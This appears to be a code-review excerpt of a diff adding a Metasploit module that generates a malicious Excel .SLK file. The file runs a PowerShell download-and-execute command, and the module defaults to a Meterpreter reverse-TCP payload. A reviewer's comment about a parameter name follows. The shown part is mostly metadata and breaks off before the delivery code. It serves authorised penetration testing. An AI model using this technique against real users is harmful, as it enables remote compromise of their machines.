modules/exploits/windows/fileformat/office_excel_slk.rb

```diff
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule  < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+      super(update_info(info,
+          'Name' => "Microsoft Excel .SLK Payload Delivery",
+          'Description' => %Q{
+              This module generates a download and execute powershell
+              command to be placed in an .SLK Excel spreadsheet.
+              When executed, it will retrieve a payload via HTTP
+              from a web server.
+          },
+          'Author' => [
+            'Carter Brainerd (cbrnrd)', # Metasploit module
+            'Stan Hegt (@StanHacked)', # Discovery
+            'Pieter Ceelen (@ptrpieter)' # Discovery
+          ],
+          'License' => MSF_LICENSE,
+          'References' => [
+              ['URL', 'https://blog.appriver.com/2018/02/trojan-droppers-using-symbolic-link-files'],
+              ['URL', 'https://www.twitter.com/StanHacked/status/1049047727403937795'],
+              ['URL', 'http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen']
+          ],
+          'Platform' => 'win', # idk about other platforms
+          'Stance' => Msf::Exploit::Stance::Aggressive,
+          'Targets' =>
+          [
+              ['Microsoft Excel', {} ]
+          ],
+          'DisclosureDate' => 'Oct 7 2018',
+          'DefaultTarget' => 0,
+          'Payload' => {
+              'DisableNops' => true
+          },
+          'DefaultOptions' => {
+              'DisablePayloadHandler' => false,
+              'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
+              'EXITFUNC' => 'thread'
+          }
+      ))
+
+      register_options([
+          OptString.new('FILENAME', [true, "Filename to save as", "#{rand_text_alphanumeric 8}.slk"])
+      ])
+  end
+
+  def on_request_uri(cli, _request)
```

Comment:
Prefixing a variable with `_` usually implies that it's not used, but this method does use it.

```suggestion
  def on_request_uri(cli, request)
```